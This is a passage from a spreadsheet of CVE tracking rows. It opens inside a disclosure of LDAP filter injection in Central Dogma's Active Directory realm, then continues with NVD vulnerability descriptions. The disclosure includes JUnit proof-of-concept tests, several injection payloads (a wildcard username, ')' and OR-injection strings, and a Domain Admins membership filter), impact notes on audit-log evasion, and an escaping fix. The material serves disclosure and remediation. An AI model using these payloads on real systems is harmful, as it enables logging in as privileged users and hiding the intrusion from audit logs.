    @DisplayName("baseline: typing 'alice' resolves to the alice DN")
    void baselineHonest() throws Exception {
        final RecordingRealm realm = new RecordingRealm();
        final String dn = realm.findUserDn(factory(), "alice");
        assertThat(dn).isEqualTo("cn=alice,dc=example,dc=com");
        assertThat(realm.capturedFilter).isEqualTo("cn=alice");
    }
    @Test @Order(2)
    @DisplayName("VULN: typing '*' resolves to the FIRST entry (admin), not alice")
    void wildcardLandsOnAdmin() throws Exception {
        final RecordingRealm realm = new RecordingRealm();
        final String dn = realm.findUserDn(factory(), "*");
        assertThat(realm.capturedFilter).isEqualTo("cn=*");
        assertThat(dn).isEqualTo("cn=admin,dc=example,dc=com");
        // → If the attacker also has the admin password, they log in as admin
        //   while the audit log records the typed username "*".
    }
    @Test @Order(3)
    @DisplayName("VULN: filter structure can be broken with ')' injection")
    void filterStructureInjection() throws Exception {
        final RecordingRealm realm = new RecordingRealm();
        assertThatThrownBy(() -&gt; realm.findUserDn(factory(), "alice)(uid=*"))
                .hasMessageContaining("filter")
                .hasMessageContaining("malformed")
                .matches(t -&gt; t instanceof javax.naming.NamingException ||
                              t.getCause() instanceof javax.naming.NamingException);
        assertThat(realm.capturedFilter).isEqualTo("cn=alice)(uid=*");
    }
    @Test @Order(4)
    @DisplayName("VULN: AND-injection can broaden the result set silently")
    void andInjectionBroadens() throws Exception {
        final RecordingRealm realm = new RecordingRealm();
        try {
            realm.findUserDn(factory(), "x)(|(cn=alice)(cn=admin");
        } catch (Exception ignored) { /* server may reject */ }
        assertThat(realm.capturedFilter).contains(")(|(");
    }
}
```
### Build dependency (`server-auth/shiro/build.gradle`)
```groovy
dependencies {
    testImplementation 'com.unboundid:unboundid-ldapsdk:7.0.0'
}
```
### Run
```bash
./gradlew :server-auth-shiro:test \
  --tests com.linecorp.centraldogma.server.auth.shiro.realm.LdapInjectionPoCTest \
  --info
```
### Expected output (VULNERABLE — current code)
```
LdapInjectionPoCTest &gt; baselineHonest            PASSED
LdapInjectionPoCTest &gt; wildcardLandsOnAdmin       PASSED  ← VULN
LdapInjectionPoCTest &gt; filterStructureInjection   PASSED  ← VULN
LdapInjectionPoCTest &gt; andInjectionBroadens       PASSED  ← VULN
```
After the patch is applied (RFC 4515 escape helper), the VULN tests fail in a specific way, e.g. `Expected captured filter to be "cn=*" but was "cn=\2a"` — they then serve as regression tests by flipping the assertions.
---
## Impact
**Threat model:** any unauthenticated network client that can reach the Central Dogma login page. No prior account, no MITM position required — the attack is performed during a normal login request.
1. **Authentication confusion** — In AD environments that select this realm (the canonical LINE corporate scenario), typing username `*` causes the realm to look up the first directory entry (typically `Administrator`, `admin`, or a service account in alphabetical AD ordering) and attempt bind with the attacker's password. If the attacker also possesses any valid user's password — easily obtained via password reuse, accidental Slack leak, repo commit, or peer compromise — and that password happens to authenticate the first directory entry (rare but devastating), the attacker logs in as a privileged user while audit logs record the literal username `*`.
2. **Audit log evasion / compliance failure** — Payloads like `bob)(uid=alice` are logged verbatim while the LDAP filter is malformed. Central Dogma's audit trail is a primary control for configuration change accountability. Loss of accountability constitutes a direct violation of **SOX §404**, **PCI-DSS §10**, **ISO 27001 A.12.4**.
3. **Directory enumeration** — Wildcard payloads (`a*`, `b*`, …) combined with timing analysis allow blind enumeration of corporate AD structure: user existence, OU layout, admin group membership. While AD structure is not strictly secret, leaking it from an internet-exposed Central Dogma feeds spear-phishing target lists.
4. **Group-membership filter injection** — Payload `a)(objectClass=*)(memberOf=CN=Domain Admins,...` (against the common AD filter `(&amp;(objectClass=user)(sAMAccountName={0}))`) narrows the search to Domain Admin members and returns the first one. The attacker need only know any Domain Admin's password (separately compromised) to land in Central Dogma as that user. AD itself is not breached, but Central Dogma's view of the principal is.
&gt; **Scope is Changed (CVSS)** because the injection traverses the trust boundary between Central Dogma and the separate AD/LDAP security authority.
---
## How to fix
Add an RFC 4515 §3 filter escape helper and apply it before substitution:
```java
// SearchFirstActiveDirectoryRealm.java
static String encodeLdapFilter(String v) {
    if (v == null) return "";
    final StringBuilder sb = new StringBuilder(v.length());
    for (int i = 0; i &lt; v.length(); i++) {
        final char c = v.charAt(i);
        switch (c) {
            case '\\': sb.append("\\5c"); break;
            case '*':  sb.append("\\2a"); break;
            case '(':  sb.append("\\28"); break;
            case ')':  sb.append("\\29"); break;
            case '\0': sb.append("\\00"); break;
            default:   sb.append(c);
        }
    }
    return sb.toString();
}
// inside findUserDn():
final String escaped = encodeLdapFilter(username);
final String filter =
        searchFilter != null ? USERNAME_PLACEHOLDER.matcher(searchFilter)
                                                   .replaceAll(Matcher.quoteReplacement(escaped))
                             : escaped;
```
**Notes:**
- `Matcher.quoteReplacement` is required because the escape produces backslashes (`\5c`) that `Matcher.replaceAll` would otherwise interpret as backreferences.
- DN escape (RFC 4514) is a different alphabet — not needed here because the username is used in a **filter**, not a DN. If a future change uses the username to build a DN, RFC 4514 escape must be added separately.
- **Do not** rely on `loginNameNormalizer` for this defense — it is Unicode lowercase only.
### Regression tests (drop into same test class)
```java
@Test
void escapeBlocksFilterInjection() {
    assertThat(SearchFirstActiveDirectoryRealm.encodeLdapFilter("*")).isEqualTo("\\2a");
    assertThat(SearchFirstActiveDirectoryRealm.encodeLdapFilter("alice)(uid=*"))
            .isEqualTo("alice\\29\\28uid=\\2a");
    assertThat(SearchFirstActiveDirectoryRealm.encodeLdapFilter("a\\b")).isEqualTo("a\\5cb");
}
```</t>
        </is>
      </c>
      <c r="S589" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-11748</t>
        </is>
      </c>
    </row>
    <row r="590">
      <c r="A590" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B590" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C590" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13326</t>
        </is>
      </c>
      <c r="D590" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E590" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F590" s="5" t="inlineStr">
        <is>
          <t>a59d8014-47c4-4630-ab43-e1b13cbe58e3</t>
        </is>
      </c>
      <c r="G590" s="5" t="inlineStr"/>
      <c r="H590" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I590" s="5" t="inlineStr"/>
      <c r="J590" s="5" t="inlineStr"/>
      <c r="K590" s="5" t="inlineStr"/>
      <c r="L590" s="5" t="inlineStr"/>
      <c r="M590" s="5" t="inlineStr"/>
      <c r="N590" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O590" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P590" s="5" t="inlineStr"/>
      <c r="Q590" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-191</t>
        </is>
      </c>
      <c r="R590" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds read in Qt NFC's language code length parsing allows a physically proximate attacker to cause a denial of service or limited memory disclosure via a crafted NFC tag.</t>
        </is>
      </c>
      <c r="S590" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13326</t>
        </is>
      </c>
    </row>
    <row r="591">
      <c r="A591" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B591" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C591" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45056</t>
        </is>
      </c>
      <c r="D591" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E591" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F591" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G591" s="5" t="inlineStr"/>
      <c r="H591" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I591" s="5" t="inlineStr"/>
      <c r="J591" s="5" t="inlineStr"/>
      <c r="K591" s="5" t="inlineStr"/>
      <c r="L591" s="5" t="inlineStr"/>
      <c r="M591" s="5" t="inlineStr"/>
      <c r="N591" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O591" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P591" s="5" t="inlineStr"/>
      <c r="Q591" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="R591" s="5" t="inlineStr">
        <is>
          <t>matrix-sdk-crypto is a no-network-IO implementation of a state machine that handles end-to-end encryption for Matrix clients. Starting in version 0.12.0 and prior to version 0.17.0, the matrix-sdk-crypto crate was missing a check for the user ID when decrypting an Olm-encrypted event containing the `sender_device_keys` property. This could be exploited to forge an encrypted to-device event, but only if the attacker colludes with the homeserver operator. This issue is fixed in matrix-sdk-crypto 0.17.0. There are no known workarounds for the issue.</t>
        </is>
      </c>
      <c r="S591" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45056</t>
        </is>
      </c>
    </row>
    <row r="592">
      <c r="A592" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B592" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C592" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48490</t>
        </is>
      </c>
      <c r="D592" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E592" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F592" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G592" s="5" t="inlineStr"/>
      <c r="H592" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I592" s="5" t="inlineStr"/>
      <c r="J592" s="5" t="inlineStr"/>
      <c r="K592" s="5" t="inlineStr"/>
      <c r="L592" s="5" t="inlineStr"/>
      <c r="M592" s="5" t="inlineStr"/>
      <c r="N592" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O592" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P592" s="5" t="inlineStr"/>
      <c r="Q592" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="R592" s="5" t="inlineStr">
        <is>
          <t>ArduinoCore-avr contains the source code and configuration files of the Arduino AVR Boards platform. A vulnerability in versions prior to 1.8.8 allows an attacker to trigger a stack-based buffer overflow when concatenating floating-point values of sufficiently large magnitude onto an Arduino String object. By passing values near the extremes of the float or double range to `String::concat(float)`, `String::concat(double)`, `String::operator+=()`, or the `+` operator with a float/double operand, `dtostrf()` writes beyond the fixed-size stack buffer, causing memory corruption and denial of service. Under specific conditions, this could enable arbitrary code execution on AVR-based Arduino boards. The fix is included starting from the `1.8.8 `release.</t>
        </is>
      </c>
      <c r="S592" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48490</t>
        </is>
      </c>
    </row>
    <row r="593">
      <c r="A593" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B593" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C593" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50025</t>
        </is>
      </c>
      <c r="D593" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E593" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F593" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G593" s="5" t="inlineStr"/>
      <c r="H593" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I593" s="5" t="inlineStr"/>
      <c r="J593" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="K593" s="5" t="inlineStr"/>
      <c r="L593" s="5" t="inlineStr"/>
      <c r="M593" s="5" t="inlineStr"/>
      <c r="N593" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O593" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P593" s="5" t="inlineStr"/>
      <c r="Q593" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-306, CWE-346, CWE-352, CWE-862</t>
        </is>
      </c>
      <c r="R593" s="5" t="inlineStr">
        <is>
          <t>Mousehole is a background service to update a seedbox IP for MAM and web app to manage it. Prior to version 0.4.05, Mousehole's HTTP/WebSocket management boundary is reachable without application-layer authentication or browser/LAN provenance checks. The service stores a MyAnonamouse (MAM) session cookie in state and reuses the same cookie-bearing serialization for persisted state, public API responses, and WebSocket state updates. Any client that can reach the published Mousehole port can read cookie-bearing state, connect to WebSocket state updates, replace the stored cookie, or force MAM update side effects. The deployment examples publish port 5010 broadly with Docker's `5010:5010` syntax, which can make the issue reachable on mixed-trust LAN/VPN interfaces. Version 0.4.0 patches the issue.</t>
        </is>
      </c>
      <c r="S593" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50025</t>
        </is>
      </c>
    </row>
    <row r="594">
      <c r="A594" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B594" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C594" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84941</t>
        </is>
      </c>
      <c r="D594" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E594" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F594" s="5" t="inlineStr">
        <is>
          <t>f23511db-6c3e-4e32-a477-6aa17d310630</t>
        </is>
      </c>
      <c r="G594" s="5" t="inlineStr"/>
      <c r="H594" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I594" s="5" t="inlineStr"/>
      <c r="J594" s="5" t="inlineStr"/>
      <c r="K594" s="5" t="inlineStr"/>
      <c r="L594" s="5" t="inlineStr"/>
      <c r="M594" s="5" t="inlineStr"/>
      <c r="N594" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O594" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P594" s="5" t="inlineStr"/>
      <c r="Q594" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="R594" s="5" t="inlineStr">
        <is>
          <t>An information disclosure vulnerability in the SAML Single Sign-On (SSO) functionality of Omada Controller allows an authenticated user with SAML configuration privileges to access sensitive information due to insufficient validation of user-supplied SAML metadata. Successful exploitation could result in unauthorized disclosure of sensitive information.</t>
        </is>
      </c>
      <c r="S594" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84941</t>
        </is>
      </c>
    </row>
    <row r="595">
      <c r="A595" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B595" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C595" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86804</t>
        </is>
      </c>
      <c r="D595" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E595" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F595" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G595" s="5" t="inlineStr"/>
      <c r="H595" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I595" s="5" t="inlineStr"/>
      <c r="J595" s="5" t="inlineStr"/>
      <c r="K595" s="5" t="inlineStr"/>
      <c r="L595" s="5" t="inlineStr"/>
      <c r="M595" s="5" t="inlineStr"/>
      <c r="N595" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O595" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P595" s="5" t="inlineStr"/>
      <c r="Q595" s="5" t="inlineStr">
        <is>
          <t>CWE-266, CWE-285</t>
        </is>
      </c>
      <c r="R595" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in seakee CPA-Manager-Plus up to 1.11.10. This vulnerability affects the function CPAResource of the file apps/manager-server/internal/http/controller/proxy/handler.go of the component HTTP Handler. The manipulation leads to improper authorization. It is possible to initiate the attack remotely. Upgrading to version 1.11.11 is able to resolve this issue. The identifier of the patch is 842eec791377ddcbea5cd639bc065eaa4801d656. It is suggested to upgrade the affected component.</t>
        </is>
      </c>
      <c r="S595" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86804</t>
        </is>
      </c>
    </row>
    <row r="596">
      <c r="A596" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B596" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C596" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87727</t>
        </is>
      </c>
      <c r="D596" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E596" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F596" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G596" s="5" t="inlineStr"/>
      <c r="H596" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I596" s="5" t="inlineStr"/>
      <c r="J596" s="5" t="inlineStr"/>
      <c r="K596" s="5" t="inlineStr"/>
      <c r="L596" s="5" t="inlineStr"/>
      <c r="M596" s="5" t="inlineStr"/>
      <c r="N596" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O596" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P596" s="5" t="inlineStr"/>
      <c r="Q596" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R596" s="5" t="inlineStr">
        <is>
          <t>a-blog cms Ver. 3.2.33 and earlier contains a path traversal vulnerability, which allows an unauthenticated attacker to read or delete arbitrary files on the affected product.</t>
        </is>
      </c>
      <c r="S596" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87727</t>
        </is>
      </c>
    </row>
    <row r="597">
      <c r="A597" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B597" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C597" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89173</t>
        </is>
      </c>
      <c r="D597" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E597" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F597" s="5" t="inlineStr">
        <is>
          <t>twcert@cert.org.tw</t>
        </is>
      </c>
      <c r="G597" s="5" t="inlineStr"/>
      <c r="H597" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I597" s="5" t="inlineStr"/>
      <c r="J597" s="5" t="inlineStr"/>
      <c r="K597" s="5" t="inlineStr"/>
      <c r="L597" s="5" t="inlineStr"/>
      <c r="M597" s="5" t="inlineStr"/>
      <c r="N597" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O597" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P597" s="5" t="inlineStr"/>
      <c r="Q597" s="5" t="inlineStr">
        <is>
          <t>CWE-204</t>
        </is>
      </c>
      <c r="R597" s="5" t="inlineStr">
        <is>
          <t>Smart Video Intercom System developed by Kingdom Communication Associated has a Sensitive Data Exposure vulnerability. Unauthenticated remote attackers can enumerate valid user accounts by exploiting differences in system responses.</t>
        </is>
      </c>
      <c r="S597" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89173</t>
        </is>
      </c>
    </row>
    <row r="598">
      <c r="A598" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B598" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C598" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89175</t>
        </is>
      </c>
      <c r="D598" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E598" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F598" s="5" t="inlineStr">
        <is>
          <t>twcert@cert.org.tw</t>
        </is>
      </c>
      <c r="G598" s="5" t="inlineStr"/>
      <c r="H598" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I598" s="5" t="inlineStr"/>
      <c r="J598" s="5" t="inlineStr"/>
      <c r="K598" s="5" t="inlineStr"/>
      <c r="L598" s="5" t="inlineStr"/>
      <c r="M598" s="5" t="inlineStr"/>
      <c r="N598" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O598" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P598" s="5" t="inlineStr"/>
      <c r="Q598" s="5" t="inlineStr">
        <is>
          <t>CWE-602</t>
        </is>
      </c>
      <c r="R598" s="5" t="inlineStr">
        <is>
          <t>Smart Video Intercom System developed by Kingdom Communication Associated has a Client-Side Authentication vulnerability. Unauthenticated remote attackers can bypass authentication to access specific pages and obtain partial system configuration values.</t>
        </is>
      </c>
      <c r="S598" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89175</t>
        </is>
      </c>
    </row>
    <row r="599">
      <c r="A599" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B599" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C599" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89242</t>
        </is>
      </c>
      <c r="D599" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E599" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F599" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G599" s="5" t="inlineStr"/>
      <c r="H599" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I599" s="5" t="inlineStr"/>
      <c r="J599" s="5" t="inlineStr"/>
      <c r="K599" s="5" t="inlineStr"/>
      <c r="L599" s="5" t="inlineStr"/>
      <c r="M599" s="5" t="inlineStr"/>
      <c r="N599" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O599" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P599" s="5" t="inlineStr"/>
      <c r="Q599" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R599" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a server-side request forgery vulnerability in the _json_decode function that fetches remote URLs and local file paths without SSRF validation. Unauthenticated attackers can POST file paths or HTTP URLs to login.json.php to read local files or access internal services, with results parsed as login credentials.</t>
        </is>
      </c>
      <c r="S599" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89242</t>
        </is>
      </c>
    </row>
    <row r="600">
      <c r="A600" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B600" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C600" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89248</t>
        </is>
      </c>
      <c r="D600" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E600" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F600" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G600" s="5" t="inlineStr"/>
      <c r="H600" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I600" s="5" t="inlineStr"/>
      <c r="J600" s="5" t="inlineStr"/>
      <c r="K600" s="5" t="inlineStr"/>
      <c r="L600" s="5" t="inlineStr"/>
      <c r="M600" s="5" t="inlineStr"/>
      <c r="N600" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O600" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P600" s="5" t="inlineStr"/>
      <c r="Q600" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R600" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 is missing an authentication/authorization check in plugin/WebRTC/status.json.php. When the WebRTC plugin is present, any unauthenticated remote user can request /plugin/WebRTC/status.json.php and receive JSON containing the absolute filesystem path of the WebRTC2RTMP helper binary (revealing the document-root path), the configured WebRTC port, file_exists/is_executable status for the binary, the contents of the WebRTC log/JSON files (videos/WebRTC2RTMP.log) when present, and whether the configured port is reachable on loopback (127.0.0.1) and on the public address. The endpoint performs no User::isLogged(), User::isAdmin(), or forbiddenPage() check. The issue was unfixed at the time of reporting.</t>
        </is>
      </c>
      <c r="S600" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89248</t>
        </is>
      </c>
    </row>
    <row r="601">
      <c r="A601" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B601" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C601" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89261</t>
        </is>
      </c>
      <c r="D601" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E601" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F601" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G601" s="5" t="inlineStr"/>
      <c r="H601" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I601" s="5" t="inlineStr"/>
      <c r="J601" s="5" t="inlineStr">
        <is>
          <t>elastic</t>
        </is>
      </c>
      <c r="K601" s="5" t="inlineStr"/>
      <c r="L601" s="5" t="inlineStr"/>
      <c r="M601" s="5" t="inlineStr"/>
      <c r="N601" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O601" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P601" s="5" t="inlineStr"/>
      <c r="Q601" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R601" s="5" t="inlineStr">
        <is>
          <t>MoguBlog through 6.2 exposes Elasticsearch index management endpoints in the mogu_search service without authentication, allowing remote attackers to delete, recreate, or alter the blog search index. Attackers can invoke POST endpoints to wipe the entire search index, delete specific documents, or inject malicious index entries, causing search functionality to return incorrect or no results.</t>
        </is>
      </c>
      <c r="S601" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89261</t>
        </is>
      </c>
    </row>
    <row r="602">
      <c r="A602" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B602" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C602" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89263</t>
        </is>
      </c>
      <c r="D602" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E602" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F602" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G602" s="5" t="inlineStr"/>
      <c r="H602" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I602" s="5" t="inlineStr"/>
      <c r="J602" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="K602" s="5" t="inlineStr"/>
      <c r="L602" s="5" t="inlineStr"/>
      <c r="M602" s="5" t="inlineStr"/>
      <c r="N602" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O602" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P602" s="5" t="inlineStr"/>
      <c r="Q602" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R602" s="5" t="inlineStr">
        <is>
          <t>MoguBlog through 6.2 fails to authenticate requests to the /web/comment/closeEmailNotification endpoint, allowing unauthenticated attackers to disable email notifications for arbitrary users. Remote callers can modify the startEmailNotification flag in Redis cache for any user identifier to suppress reply notifications without authorization.</t>
        </is>
      </c>
      <c r="S602" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89263</t>
        </is>
      </c>
    </row>
    <row r="603">
      <c r="A603" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B603" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C603" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90449</t>
        </is>
      </c>
      <c r="D603" s="5" t="n">
